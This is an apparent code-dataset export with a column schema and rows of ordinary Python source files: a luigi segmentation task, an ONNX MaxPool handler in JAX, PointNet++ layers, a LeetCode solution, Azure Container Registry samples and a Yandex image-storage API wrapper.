seq_id
stringlengths 7
11
| text
stringlengths 156
1.7M
| repo_name
stringlengths 7
125
| sub_path
stringlengths 4
132
| file_name
stringlengths 4
77
| file_ext
stringclasses 6
values | file_size_in_byte
int64 156
1.7M
| program_lang
stringclasses 1
value | lang
stringclasses 38
values | doc_type
stringclasses 1
value | stars
int64 0
24.2k
⌀ | dataset
stringclasses 1
value | pt
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|---|---|
650534977
|
#! /bin/python
import os
import sys
import json
from concurrent import futures
import luigi
import numpy as np
import nifty.tools as nt
import elf.segmentation.features as feats
import elf.segmentation.multicut as mc
from vigra.analysis import relabelConsecutive
import cluster_tools.utils.volume_utils as vu
import cluster_tools.utils.function_utils as fu
from cluster_tools.cluster_tasks import SlurmTask, LocalTask, LSFTask
#
# SliceAgglomeration Tasks
#
class SliceAgglomerationBase(luigi.Task):
""" SliceAgglomeration base class
"""
task_name = 'slice_agglomeration'
src_file = os.path.abspath(__file__)
# input and output volumes
input_path = luigi.Parameter()
input_key = luigi.Parameter()
output_path = luigi.Parameter()
output_key = luigi.Parameter()
have_ignore_label = luigi.BoolParameter()
dependency = luigi.TaskParameter()
def requires(self):
return self.dependency
@staticmethod
def default_task_config():
config = LocalTask.default_task_config()
config.update({'beta_stitch': 0.5,
'beta': 0.75,
'invert_inputs': False,
'channel_begin': None,
'channel_end': None})
return config
def clean_up_for_retry(self, block_list):
super().clean_up_for_retry(block_list)
# TODO remove any output of failed blocks because it might be corrupted
def run_impl(self):
# get the global config and init configs
shebang, block_shape, roi_begin, roi_end = self.global_config_values()
self.init(shebang)
# get volume shape and chunks
with vu.file_reader(self.output_path, 'r') as f:
shape = f[self.output_key].shape
chunks = f[self.output_key].chunks
assert len(shape) == 3
# load the slice_agglomeration config
config = self.get_task_config()
# we deal with different block shapes:
# - block_shape: the block shape used for watershed calculation
# - slice_shape: the (2d) shape of a single slice
# - slice_block_shape: the watershed volume chunks in z + full slice shape
slice_shape = shape[1:]
slice_block_shape = (chunks[0],) + slice_shape
# update the config with input and output paths and keys
# as well as block shape
config.update({'input_path': self.input_path, 'input_key': self.input_key,
'output_path': self.output_path, 'output_key': self.output_key,
'block_shape': slice_block_shape, 'have_ignore_label': self.have_ignore_label,
'block_shape_2d': block_shape[1:]})
if self.n_retries == 0:
block_list = vu.blocks_in_volume(shape, slice_block_shape, roi_begin, roi_end)
else:
block_list = self.block_list
self.clean_up_for_retry(block_list)
self._write_log('scheduling %i blocks to be processed' % len(block_list))
n_jobs = min(len(block_list), self.max_jobs)
# prime and run the jobs
self.prepare_jobs(n_jobs, block_list, config)
self.submit_jobs(n_jobs)
# wait till jobs finish and check for job success
self.wait_for_jobs()
self.check_jobs(n_jobs)
class SliceAgglomerationLocal(SliceAgglomerationBase, LocalTask):
"""
SliceAgglomeration on local machine
"""
pass
class SliceAgglomerationSlurm(SliceAgglomerationBase, SlurmTask):
"""
SliceAgglomeration on slurm cluster
"""
pass
class SliceAgglomerationLSF(SliceAgglomerationBase, LSFTask):
"""
SliceAgglomeration on lsf cluster
"""
pass
#
# Implementation
#
def agglomerate_slice(seg, input_, z, config):
# check if this slic is empty
if np.sum(seg) == 0:
return seg
have_ignore_label = config['have_ignore_label']
block_shape = config['block_shape_2d']
foreground_mask = seg != 0
# relabel the segmentation
_, max_id, _ = relabelConsecutive(seg, out=seg, keep_zeros=True, start_label=1)
seg = seg.astype('uint32')
# construct rag and get edge features
rag = feats.compute_rag(seg, n_labels=max_id + 1, n_threads=1)
edge_features = feats.compute_boundary_mean_and_length(rag, input_, n_threads=1)[:, 0]
# set edges to ignore label to be maximally repulsive
if have_ignore_label:
uv_ids = rag.uvIds()
ignore_mask = (uv_ids == 0).any(axis=1)
edge_features[ignore_mask] = 1
# get the stitiching edges
stitch_edges = feats.get_stitch_edges(rag, seg, block_shape)
beta1 = config.get('beta_stitch', 0.5)
beta2 = config.get('beta', 0.75)
costs = np.zeros_like(edge_features)
costs[stitch_edges] = mc.compute_edge_costs(edge_features[stitch_edges], beta=beta1)
costs[~stitch_edges] = mc.compute_edge_costs(edge_features[~stitch_edges], beta=beta2)
node_labels = mc.multicut_kernighan_lin(rag, costs)
node_labels, max_id, _ = relabelConsecutive(node_labels, start_label=1, keep_zeros=True)
# project node labels back to segmentation
seg = feats.project_node_labels_to_pixels(rag, node_labels, n_threads=1).astype('uint64')
# we change to slice base id offset
id_offset = z * np.prod(list(seg.shape))
assert id_offset < np.iinfo('uint64').max, "Id overflow"
# add offset back to segmentation
seg[foreground_mask] += id_offset
return seg
def _slice_agglomeration(blocking, block_id, ds_in, ds_out, config):
fu.log("start processing block %i" % block_id)
n_threads = config['threads_per_job']
ds_in.n_threads = n_threads
ds_out.n_threads = n_threads
invert_inputs = config.get('invert_inputs', False)
bb = vu.block_to_bb(blocking.getBlock(block_id))
# load the segmentation / output
seg = ds_out[bb]
# load the input data
ndim_in = ds_in.ndim
# we are conservative and always accumulate affinities with max
if ndim_in == 4:
channel_begin = config.get('channel_begin', None)
channel_end = config.get('channel_end', None)
channel_begin = 0 if channel_begin is None else channel_begin
channel_end = ds_in.shape[0] if channel_end is None else channel_end
bb_in = (slice(channel_begin, channel_end),) + bb
input_ = ds_in[bb_in]
if invert_inputs:
input_ = 1. - input_
input_ = vu.normalize(np.max(input_, axis=0))
else:
input_ = vu.normalize(ds_in[bb])
if invert_inputs:
input_ = 1. - input_
with futures.ThreadPoolExecutor(n_threads) as tp:
tasks = [tp.submit(agglomerate_slice, seg[z], input_[z], z, config)
for z in range(seg.shape[0])]
slice_segs = [t.result() for t in tasks]
seg = np.concatenate([sseg[None] for sseg in slice_segs], axis=0)
ds_out[bb] = seg
# log block success
fu.log_block_success(block_id)
def slice_agglomeration(job_id, config_path):
fu.log("start processing job %i" % job_id)
fu.log("reading config from %s" % config_path)
with open(config_path, 'r') as f:
config = json.load(f)
# read the input cofig
input_path = config['input_path']
input_key = config['input_key']
shape = list(vu.get_shape(input_path, input_key))
if len(shape) == 4:
shape = shape[1:]
block_shape = list(config['block_shape'])
block_list = config['block_list']
# read the output config
output_path = config['output_path']
output_key = config['output_key']
# get the blocking
blocking = nt.blocking([0, 0, 0], shape, block_shape)
# submit blocks
with vu.file_reader(input_path, 'r') as f_in, vu.file_reader(output_path) as f_out:
ds_in = f_in[input_key]
assert ds_in.ndim in (3, 4)
ds_out = f_out[output_key]
assert ds_out.ndim == 3
for block_id in block_list:
_slice_agglomeration(blocking, block_id, ds_in, ds_out, config)
# log success
fu.log_job_success(job_id)
if __name__ == '__main__':
path = sys.argv[1]
assert os.path.exists(path), path
job_id = int(os.path.split(path)[1].split('.')[0].split('_')[-1])
slice_agglomeration(job_id, path)
|
constantinpape/cluster_tools
|
cluster_tools/watershed/slice_agglomeration.py
|
slice_agglomeration.py
|
py
| 8,264 |
python
|
en
|
code
| 32 |
github-code
|
6
|
1293372351
|
import inspect
from functools import partial
import jax.numpy as jnp
from jax import jit, lax
from onnx_jax.handlers.backend_handler import BackendHandler
from onnx_jax.handlers.handler import onnx_op
from onnx_jax.pb_wrapper import OnnxNode
@onnx_op("MaxPool")
class MaxPool(BackendHandler):
@classmethod
def _common(cls, node: OnnxNode, **kwargs):
if len(node.outputs) > 1:
raise Exception('MaxPool with indices is not supported')
cls._rewrite(node)
cls._prepare(node)
return onnx_maxpool
@classmethod
def version_1(cls, node, **kwargs):
return cls._common(node, **kwargs)
@classmethod
def version_8(cls, node, **kwargs):
return cls._common(node, **kwargs)
@classmethod
def version_10(cls, node, **kwargs):
return cls._common(node, **kwargs)
@classmethod
def version_11(cls, node, **kwargs):
return cls._common(node, **kwargs)
@classmethod
def version_12(cls, node, **kwargs):
return cls._common(node, **kwargs)
@classmethod
def _rewrite(cls, node: OnnxNode):
if 'auto_pad' not in node.attrs:
node.attrs['auto_pad'] = 'NOTSET'
if 'ceil_mode' not in node.attrs:
node.attrs['ceil_mode'] = 0
if 'storage_order' not in node.attrs:
node.attrs['storage_order'] = 0
@classmethod
def _prepare(cls, node: OnnxNode):
args = list(inspect.signature(onnx_maxpool).parameters.keys())
attrs = [node.attrs.get(k, None) for k in args[node.len_inputs :]]
node.attrs_list.extend(attrs)
def pad_helper(input_rank, pads=None):
pad_pairs = len(pads) // 2 if pads else 0
pad_width = []
for _ in range(input_rank - pad_pairs):
pad_width.append((0, 0))
for idx in range(pad_pairs):
pad_width.append((pads[idx], pads[idx + pad_pairs]))
return pad_width
@partial(jit, static_argnums=(1, 2, 3, 4, 5, 6, 7))
def onnx_maxpool(
x,
kernel_shape,
pads=None,
strides=None,
dilations=None,
auto_pad='NOTSET',
ceil_mode=0,
storage_order=0,
):
dims = (1,) * (x.ndim - len(kernel_shape)) + tuple(kernel_shape)
strides = (
((1,) * (x.ndim - len(strides)) + tuple(strides)) if strides else (1,) * x.ndim
)
dilations = (
((1,) * (x.ndim - len(dilations)) + tuple(dilations))
if dilations
else (1,) * x.ndim
)
if auto_pad == "NOTSET":
pads = pad_helper(x.ndim, pads) if pads else 'VALID'
elif auto_pad == "SAME_UPPER":
pads = "SAME"
elif auto_pad == "VALID":
pads = "VALID"
elif auto_pad == "SAME_LOWER":
raise NotImplemented("MaxPool with auto_pad `SAME_LOWER`")
else:
raise ValueError(f"Invalid auto_pad attribute: {auto_pad}")
return lax.reduce_window(x, -jnp.inf, lax.max, dims, strides, pads, None, dilations)
|
gglin001/onnx-jax
|
onnx_jax/handlers/backend/maxpool.py
|
maxpool.py
|
py
| 2,911 |
python
|
en
|
code
| 7 |
github-code
|
6
|
277421218
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from time import time
import numpy as np
from pointnet2.lib import pointnet2_utils as pointutils
# import lib.pointnet2_utils as pointutils
def quat2mat(quat):
x, y, z, w = quat[:, 0], quat[:, 1], quat[:, 2], quat[:, 3]
B = quat.size(0)
w2, x2, y2, z2 = w.pow(2), x.pow(2), y.pow(2), z.pow(2)
wx, wy, wz = w*x, w*y, w*z
xy, xz, yz = x*y, x*z, y*z
rotMat = torch.stack([w2 + x2 - y2 - z2, 2*xy - 2*wz, 2*wy + 2*xz,
2*wz + 2*xy, w2 - x2 + y2 - z2, 2*yz - 2*wx,
2*xz - 2*wy, 2*wx + 2*yz, w2 - x2 - y2 + z2], dim=1).reshape(B, 3, 3)
return rotMat
def transform_point_cloud(point_cloud, rotation, translation):
if len(rotation.size()) == 2:
rot_mat = quat2mat(rotation)
else:
rot_mat = rotation
return torch.matmul(rot_mat, point_cloud) + translation.unsqueeze(2)
def npmat2euler(mats, seq='zyx'):
eulers = []
for i in range(mats.shape[0]):
r = Rotation.from_dcm(mats[i])
eulers.append(r.as_euler(seq, degrees=True))
return np.asarray(eulers, dtype='float32')
def timeit(tag, t):
print("{}: {}s".format(tag, time() - t))
return time()
def pc_normalize(pc):
l = pc.shape[0]
centroid = np.mean(pc, axis=0)
pc = pc - centroid
m = np.max(np.sqrt(np.sum(pc**2, axis=1)))
pc = pc / m
return pc
def square_distance(src, dst):
"""
Calculate Euclid distance between each two points.
src^T * dst = xn * xm + yn * ym + zn * zm;
sum(src^2, dim=-1) = xn*xn + yn*yn + zn*zn;
sum(dst^2, dim=-1) = xm*xm + ym*ym + zm*zm;
dist = (xn - xm)^2 + (yn - ym)^2 + (zn - zm)^2
= sum(src**2,dim=-1)+sum(dst**2,dim=-1)-2*src^T*dst
Input:
src: source points, [B, N, C]
dst: target points, [B, M, C]
Output:
dist: per-point square distance, [B, N, M]
"""
B, N, _ = src.shape
_, M, _ = dst.shape
dist = -2 * torch.matmul(src, dst.permute(0, 2, 1))
dist += torch.sum(src ** 2, -1).view(B, N, 1)
dist += torch.sum(dst ** 2, -1).view(B, 1, M)
return dist
def index_points(points, idx):
"""
Input:
points: input points data, [B, N, C]
idx: sample index data, [B, S]
Return:
new_points:, indexed points data, [B, S, C]
"""
device = points.device
B = points.shape[0]
view_shape = list(idx.shape)
view_shape[1:] = [1] * (len(view_shape) - 1)
repeat_shape = list(idx.shape)
repeat_shape[0] = 1
batch_indices = torch.arange(B, dtype=torch.long).to(device).view(view_shape).repeat(repeat_shape)
new_points = points[batch_indices, idx, :]
return new_points
def farthest_point_sample(xyz, npoint):
"""
Input:
xyz: pointcloud data, [B, N, C]
npoint: number of samples
Return:
centroids: sampled pointcloud index, [B, npoint]
"""
device = xyz.device
B, N, C = xyz.shape
centroids = torch.zeros(B, npoint, dtype=torch.long).to(device)
distance = torch.ones(B, N).to(device) * 1e10
farthest = torch.randint(0, N, (B,), dtype=torch.long).to(device)
batch_indices = torch.arange(B, dtype=torch.long).to(device)
for i in range(npoint):
centroids[:, i] = farthest
centroid = xyz[batch_indices, farthest, :].view(B, 1, 3)
dist = torch.sum((xyz - centroid) ** 2, -1)
mask = dist < distance
distance[mask] = dist[mask]
farthest = torch.max(distance, -1)[1]
return centroids
def knn_point(k, pos1, pos2):
'''
Input:
k: int32, number of k in k-nn search
pos1: (batch_size, ndataset, c) float32 array, input points
pos2: (batch_size, npoint, c) float32 array, query points
Output:
val: (batch_size, npoint, k) float32 array, L2 distances
idx: (batch_size, npoint, k) int32 array, indices to input points
'''
B, N, C = pos1.shape
M = pos2.shape[1]
pos1 = pos1.view(B,1,N,-1).repeat(1,M,1,1)
pos2 = pos2.view(B,M,1,-1).repeat(1,1,N,1)
dist = torch.sum(-(pos1-pos2)**2,-1)
val,idx = dist.topk(k=k,dim = -1)
return torch.sqrt(-val), idx
def query_ball_point(radius, nsample, xyz, new_xyz):
"""
Input:
radius: local region radius
nsample: max sample number in local region
xyz: all points, [B, N, C]
new_xyz: query points, [B, S, C]
Return:
group_idx: grouped points index, [B, S, nsample]
"""
device = xyz.device
B, N, C = xyz.shape
_, S, _ = new_xyz.shape
group_idx = torch.arange(N, dtype=torch.long).to(device).view(1, 1, N).repeat([B, S, 1])
sqrdists = square_distance(new_xyz, xyz)
group_idx[sqrdists > radius ** 2] = N
mask = group_idx != N
cnt = mask.sum(dim=-1)
group_idx = group_idx.sort(dim=-1)[0][:, :, :nsample]
group_first = group_idx[:, :, 0].view(B, S, 1).repeat([1, 1, nsample])
mask = group_idx == N
group_idx[mask] = group_first[mask]
return group_idx, cnt
def sample_and_group(npoint, radius, nsample, xyz, points, returnfps=False):
"""
Input:
npoint:
radius:
nsample:
xyz: input points position data, [B, N, C]
points: input points data, [B, N, D]
Return:
new_xyz: sampled points position data, [B, 1, C]
new_points: sampled points data, [B, 1, N, C+D]
"""
B, N, C = xyz.shape
S = npoint
fps_idx = farthest_point_sample(xyz, npoint) # [B, npoint, C]
new_xyz = index_points(xyz, fps_idx)
idx, _ = query_ball_point(radius, nsample, xyz, new_xyz)
grouped_xyz = index_points(xyz, idx) # [B, npoint, nsample, C]
grouped_xyz_norm = grouped_xyz - new_xyz.view(B, S, 1, C)
if points is not None:
grouped_points = index_points(points, idx)
new_points = torch.cat([grouped_xyz_norm, grouped_points], dim=-1) # [B, npoint, nsample, C+D]
else:
new_points = grouped_xyz_norm
if returnfps:
return new_xyz, new_points, grouped_xyz, fps_idx
else:
return new_xyz, new_points
def sample_and_group_all(xyz, points):
"""
Input:
xyz: input points position data, [B, N, C]
points: input points data, [B, N, D]
Return:
new_xyz: sampled points position data, [B, 1, C]
new_points: sampled points data, [B, 1, N, C+D]
"""
device = xyz.device
B, N, C = xyz.shape
new_xyz = torch.zeros(B, 1, C).to(device)
grouped_xyz = xyz.view(B, 1, N, C)
if points is not None:
new_points = torch.cat([grouped_xyz, points.view(B, 1, N, -1)], dim=-1)
else:
new_points = grouped_xyz
return new_xyz, new_points
class PointNetSetAbstraction(nn.Module):
def __init__(self, npoint, radius, nsample, in_channel, mlp, mlp2 = [], group_all = False, include_xyz=True,cov_sigma_scale=0.02,aniso_kernel_scale=0.08,use_knn=False, use_aniso_kernel=True):
super(PointNetSetAbstraction, self).__init__()
self.npoint = npoint
self.radius = radius
self.nsample = nsample
self.group_all = group_all
self.mlp_convs = nn.ModuleList()
self.mlp_bns = nn.ModuleList()
self.mlp2_convs = nn.ModuleList()
last_channel = (in_channel+3) if include_xyz else in_channel
for out_channel in mlp:
self.mlp_convs.append(nn.Conv2d(last_channel, out_channel, 1, bias = False))
self.mlp_bns.append(nn.BatchNorm2d(out_channel))
last_channel = out_channel
for out_channel in mlp2:
self.mlp2_convs.append(nn.Sequential(nn.Conv1d(last_channel, out_channel, 1, bias=False),
nn.BatchNorm1d(out_channel)))
last_channel = out_channel
if not use_knn:
self.queryandgroup = pointutils.QueryAndGroup(radius, nsample, use_xyz=include_xyz)
else:
if use_aniso_kernel:
self.queryandgroup =pointutils.AnisoQueryAndGroup(cov_sigma_scale=cov_sigma_scale,aniso_kernel_scale=aniso_kernel_scale, nsample=nsample, use_xyz=include_xyz)
else:
self.queryandgroup =pointutils.IsoQueryAndGroup( nsample=nsample, use_xyz=include_xyz)
# if group_all:
# if use_aniso_kernel:
# self.queryandgroup =pointutils.AnisoQueryAndGroup(cov_sigma_scale=cov_sigma_scale,aniso_kernel_scale=aniso_kernel_scale, nsample=nsample, use_xyz=include_xyz)
# else:
# self.queryandgroup = pointutils.QueryAndGroup(radius, nsample,use_xyz=include_xyz)
# #self.queryandgroup = pointutils.GroupAll(use_xyz=include_xyz)
# else:
# self.queryandgroup = pointutils.QueryAndGroup(radius, nsample,use_xyz=include_xyz)
def forward(self, xyz, points):
"""
Input:
xyz: input points position data, [B, C, N]
points: input points data, [B, D, N]
Return:
new_xyz: sampled points position data, [B, S, C]
new_points_concat: sample points feature data, [B, S, D']
"""
device = xyz.device
B, C, N = xyz.shape
xyz_t = xyz.permute(0, 2, 1).contiguous()
# if points is not None:
# points = points.permute(0, 2, 1).contiguous()
# 选取邻域点
if self.group_all == False:
fps_idx = pointutils.furthest_point_sample(xyz_t, self.npoint) # [B, N]
new_xyz = pointutils.gather_operation(xyz, fps_idx) # [B, C, N]
else:
new_xyz = xyz
new_points = self.queryandgroup(xyz_t, new_xyz.transpose(2, 1).contiguous(), points) # [B, 3+C, N, S]
# new_xyz: sampled points position data, [B, C, npoint]
# new_points: sampled points data, [B, C+D, npoint, nsample]
for i, conv in enumerate(self.mlp_convs):
bn = self.mlp_bns[i]
new_points = F.relu(bn(conv(new_points)))
new_points = torch.max(new_points, -1)[0]
for i, conv in enumerate(self.mlp2_convs):
new_points = F.relu(conv(new_points))
return new_xyz, new_points, fps_idx if not self.group_all else None
class FlowEmbedding(nn.Module):
def __init__(self, radius, nsample, in_channel, mlp, pooling='max', corr_func='concat', knn = True):
super(FlowEmbedding, self).__init__()
self.radius = radius
self.nsample = nsample
self.knn = knn
self.pooling = pooling
self.corr_func = corr_func
self.mlp_convs = nn.ModuleList()
self.mlp_bns = nn.ModuleList()
if corr_func is 'concat':
last_channel = in_channel*2+3
for out_channel in mlp:
self.mlp_convs.append(nn.Conv2d(last_channel, out_channel, 1, bias=False))
self.mlp_bns.append(nn.BatchNorm2d(out_channel))
last_channel = out_channel
def forward(self, pos1, pos2, feature1, feature2):
"""
Input:
xyz1: (batch_size, 3, npoint)
xyz2: (batch_size, 3, npoint)
feat1: (batch_size, channel, npoint)
feat2: (batch_size, channel, npoint)
Output:
xyz1: (batch_size, 3, npoint)
feat1_new: (batch_size, mlp[-1], npoint)
"""
pos1_t = pos1.permute(0, 2, 1).contiguous()
pos2_t = pos2.permute(0, 2, 1).contiguous()
B, N, C = pos1_t.shape
if self.knn:
_, idx = pointutils.knn(self.nsample, pos1_t, pos2_t)
else:
# If the ball neighborhood points are less than nsample,
# than use the knn neighborhood points
idx, cnt = query_ball_point(self.radius, self.nsample, pos2_t, pos1_t)
# 利用knn取最近的那些点
_, idx_knn = pointutils.knn(self.nsample, pos1_t, pos2_t)
cnt = cnt.view(B, -1, 1).repeat(1, 1, self.nsample)
idx = idx_knn[cnt > (self.nsample-1)]
pos2_grouped = pointutils.grouping_operation(pos2, idx) # [B, 3, N, S]
pos_diff = pos2_grouped - pos1.view(B, -1, N, 1) # [B, 3, N, S]
feat2_grouped = pointutils.grouping_operation(feature2, idx) # [B, C, N, S]
if self.corr_func=='concat':
feat_diff = torch.cat([feat2_grouped, feature1.view(B, -1, N, 1).repeat(1, 1, 1, self.nsample)], dim = 1)
feat1_new = torch.cat([pos_diff, feat_diff], dim = 1) # [B, 2*C+3,N,S]
for i, conv in enumerate(self.mlp_convs):
bn = self.mlp_bns[i]
feat1_new = F.relu(bn(conv(feat1_new)))
feat1_new = torch.max(feat1_new, -1)[0] # [B, mlp[-1], npoint]
return pos1, feat1_new
class PointNetSetUpConv(nn.Module):
def __init__(self, nsample, radius, f1_channel, f2_channel, mlp, mlp2, knn = True):
super(PointNetSetUpConv, self).__init__()
self.nsample = nsample
self.radius = radius
self.knn = knn
self.mlp1_convs = nn.ModuleList()
self.mlp2_convs = nn.ModuleList()
last_channel = f2_channel+3
for out_channel in mlp:
self.mlp1_convs.append(nn.Sequential(nn.Conv2d(last_channel, out_channel, 1, bias=False),
nn.BatchNorm2d(out_channel),
nn.ReLU(inplace=False)))
last_channel = out_channel
if len(mlp) is not 0:
last_channel = mlp[-1] + f1_channel
else:
last_channel = last_channel + f1_channel
for out_channel in mlp2:
self.mlp2_convs.append(nn.Sequential(nn.Conv1d(last_channel, out_channel, 1, bias=False),
nn.BatchNorm1d(out_channel),
nn.ReLU(inplace=False)))
last_channel = out_channel
def forward(self, pos1, pos2, feature1, feature2):
"""
Feature propagation from xyz2 (less points) to xyz1 (more points)
Inputs:
xyz1: (batch_size, 3, npoint1)
xyz2: (batch_size, 3, npoint2)
feat1: (batch_size, channel1, npoint1) features for xyz1 points (earlier layers, more points)
feat2: (batch_size, channel1, npoint2) features for xyz2 points
Output:
feat1_new: (batch_size, npoint2, mlp[-1] or mlp2[-1] or channel1+3)
TODO: Add support for skip links. Study how delta(XYZ) plays a role in feature updating.
"""
pos1_t = pos1.permute(0, 2, 1).contiguous()
pos2_t = pos2.permute(0, 2, 1).contiguous()
B,C,N = pos1.shape
if self.knn:
_, idx = pointutils.knn(self.nsample, pos1_t, pos2_t)
else:
idx, _ = query_ball_point(self.radius, self.nsample, pos2_t, pos1_t)
pos2_grouped = pointutils.grouping_operation(pos2, idx)
pos_diff = pos2_grouped - pos1.view(B, -1, N, 1) # [B,3,N1,S]
feat2_grouped = pointutils.grouping_operation(feature2, idx)
feat_new = torch.cat([feat2_grouped, pos_diff], dim = 1) # [B,C1+3,N1,S]
for conv in self.mlp1_convs:
feat_new = conv(feat_new)
# max pooling
feat_new = feat_new.max(-1)[0] # [B,mlp1[-1],N1]
# concatenate feature in early layer
if feature1 is not None:
feat_new = torch.cat([feat_new, feature1], dim=1)
# feat_new = feat_new.view(B,-1,N,1)
for conv in self.mlp2_convs:
feat_new = conv(feat_new)
return feat_new
class PointNetFeaturePropogation(nn.Module):
def __init__(self, in_channel, mlp):
super(PointNetFeaturePropogation, self).__init__()
self.mlp_convs = nn.ModuleList()
self.mlp_bns = nn.ModuleList()
last_channel = in_channel
for out_channel in mlp:
self.mlp_convs.append(nn.Conv1d(last_channel, out_channel, 1))
self.mlp_bns.append(nn.BatchNorm1d(out_channel))
last_channel = out_channel
def forward(self, pos1, pos2, feature1, feature2):
"""
Input:
xyz1: input points position data, [B, C, N]
xyz2: sampled input points position data, [B, C, S]
points1: input points data, [B, D, N]
points2: input points data, [B, D, S]
Return:
new_points: upsampled points data, [B, D', N]
"""
pos1_t = pos1.permute(0, 2, 1).contiguous()
pos2_t = pos2.permute(0, 2, 1).contiguous()
B, C, N = pos1.shape
# dists = square_distance(pos1, pos2)
# dists, idx = dists.sort(dim=-1)
# dists, idx = dists[:, :, :3], idx[:, :, :3] # [B, N, 3]
dists,idx = pointutils.three_nn(pos1_t,pos2_t)
dists[dists < 1e-10] = 1e-10
weight = 1.0 / dists
weight = weight / torch.sum(weight, -1,keepdim = True) # [B,N,3]
interpolated_feat = torch.sum(pointutils.grouping_operation(feature2, idx) * weight.view(B, 1, N, 3), dim = -1) # [B,C,N,3]
if feature1 is not None:
feat_new = torch.cat([interpolated_feat, feature1], 1)
else:
feat_new = interpolated_feat
for i, conv in enumerate(self.mlp_convs):
bn = self.mlp_bns[i]
feat_new = F.relu(bn(conv(feat_new)))
return feat_new
|
uncbiag/shapmagn
|
pointnet2/util.py
|
util.py
|
py
| 17,400 |
python
|
en
|
code
| 94 |
github-code
|
6
|
24199755237
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 5 16:12:19 2019
@author: Administrator
"""
import copy
class Solution:
def permuteUnique(self, nums):
self.__res = []
if not nums:
return self.__res
nums.sort()
self.__used = [False for _ in range(len(nums))]
self.__generate_permutation(nums, 0, [])
return self.__res
def __generate_permutation(self, nums, index, p):
if index == len(nums):
self.__res.append(copy.copy(p))
return
for i in range(len(nums)):
if self.__used[i]:
continue
if i != 0 and nums[i] == nums[i - 1] and not self.__used[i - 1]:
continue
p.append(nums[i])
self.__used[i] = True
self.__generate_permutation(nums, index + 1, p)
p.pop()
self.__used[i] = False
if __name__ == '__main__':
nums = [1, 2, 1]
res = Solution().permuteUnique(nums)
|
AiZhanghan/Leetcode
|
code/47. Permutations II.py
|
47. Permutations II.py
|
py
| 1,095 |
python
|
en
|
code
| 0 |
github-code
|
6
|
28181321143
|
import asyncio
from dotenv import find_dotenv, load_dotenv
import os
class CreateClients(object):
def __init__(self):
load_dotenv(find_dotenv())
self.account_url = os.environ["CONTAINERREGISTRY_ENDPOINT"]
async def create_registry_client(self):
# Instantiate the ContainerRegistryClient
# [START create_registry_client]
from azure.containerregistry.aio import ContainerRegistryClient
from azure.identity.aio import DefaultAzureCredential
client = ContainerRegistryClient(self.account_url, DefaultAzureCredential())
# [END create_registry_client]
async def create_repository_client(self):
# Instantiate the ContainerRegistryClient
# [START create_repository_client]
from azure.containerregistry.aio import ContainerRepository
from azure.identity.aio import DefaultAzureCredential
client = ContainerRepository(self.account_url, "my_repository", DefaultAzureCredential())
# [END create_repository_client]
async def basic_sample(self):
from azure.containerregistry.aio import ContainerRegistryClient
from azure.identity.aio import DefaultAzureCredential
# Instantiate the client
client = ContainerRegistryClient(self.account_url, DefaultAzureCredential())
async with client:
# Iterate through all the repositories
async for repository_name in client.list_repository_names():
if repository_name == "hello-world":
# Create a repository client from the registry client
repository_client = client.get_repository(repository_name)
async with repository_client:
# Show all tags
async for tag in repository_client.list_tags():
print(tag.digest)
# [START delete_repository]
await client.delete_repository("hello-world")
# [END delete_repository]
async def main():
sample = CreateClients()
await sample.create_registry_client()
await sample.create_repository_client()
await sample.basic_sample()
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
|
teaglebuilt/azure-sdk-for-python
|
sdk/containerregistry/azure-containerregistry/samples/async_samples/sample_create_client_async.py
|
sample_create_client_async.py
|
py
| 2,315 |
python
|
en
|
code
| null |
github-code
|
6
|
75136482107
|
import attr
import requests
from typing import Dict, List, Optional
@attr.s
class Image:
id: str = attr.ib()
size: int = attr.ib()
createdAt: str = attr.ib()
origUrl: Optional[str] = attr.ib(default=None)
class YandexImageAPI:
"""
This class is a wrapper around Yandex image storage API.
Its official documentation is available online:
https://yandex.ru/dev/dialogs/alice/doc/resource-upload-docpage/
"""
def __init__(self, token, skill_id, default_image_id=None, upload_just_in_time=False):
self.token = token
self.skill_id = skill_id
self.default_image_id = default_image_id
self.upload_just_in_time = upload_just_in_time
self.url2image: Dict[str, Image] = {}
self.id2image: Dict[str, Image] = {}
def update_images(self) -> None:
""" Retrieve the list of images from the cloud storage and save it to the local index. """
for image in self.get_images_list():
if image.origUrl:
self.url2image[image.origUrl] = image
self.id2image[image.id] = image
def add_image(self, url, timeout=5) -> Optional[Image]:
""" Add image to the local index and Yandex storage by its url."""
if url in self.url2image:
return self.url2image[url]
result = self.upload_image(url, timeout=timeout)
if result:
self.url2image[url] = result
self.id2image[result.id] = result
return result
def upload_image(self, url, timeout=5) -> Optional[Image]:
"""
Try to upload the image by url (without adding it to the local index)
small images take 1.5-2 seconds to upload
"""
r = requests.post(
url='https://dialogs.yandex.net/api/v1/skills/{}/images'.format(self.skill_id),
headers={'Authorization': 'OAuth {}'.format(self.token)},
json={'url': url},
timeout=timeout,
)
result = r.json().get('image')
if result:
return Image(**result)
def get_images_list(self) -> List[Image]:
""" Get all images in the Yandex storage. """
r = requests.get(
url='https://dialogs.yandex.net/api/v1/skills/{}/images'.format(self.skill_id),
headers={'Authorization': 'OAuth {}'.format(self.token)}
)
results = r.json().get('images', [])
return [Image(**item) for item in results]
def get_image_id_by_url(self, url, try_upload=None, timeout=2, default=None) -> Optional[str]:
"""
Try to get image id from local storage or quickly upload it
or return the default image.
"""
if url in self.url2image:
return self.url2image[url].id
if try_upload is None:
try_upload = self.upload_just_in_time
if try_upload:
image = self.add_image(url, timeout=timeout)
if image:
return image.id
if default:
return default
if self.default_image_id:
return self.default_image_id
def get_quota(self):
""" Get existing an occupied amount of storage for images and sounds in bytes"""
r = requests.get(
url='https://dialogs.yandex.net/api/v1/status',
headers={'Authorization': 'OAuth {}'.format(self.token)}
)
return r.json()
def delete_image(self, image_id):
""" Delete image from storage by its id and delete it from local index """
r = requests.delete(
url='https://dialogs.yandex.net/api/v1/skills/{}/images/{}'.format(self.skill_id, image_id),
headers={'Authorization': 'OAuth {}'.format(self.token)}
)
if r.ok:
if image_id in self.id2image:
image = self.id2image[image_id]
del self.id2image[image_id]
if image.origUrl in self.url2image and self.url2image[image.origUrl].id == image_id:
del self.url2image[image.origUrl]
return r.json()
|
avidale/dialogic
|
dialogic/utils/content_manager.py
|
content_manager.py
|
py
| 4,070 |
python
|
en
|
code
| 22 |
github-code
|
6
|
797067392
|
from flask import Blueprint, render_template, url_for, flash, redirect, request, abort
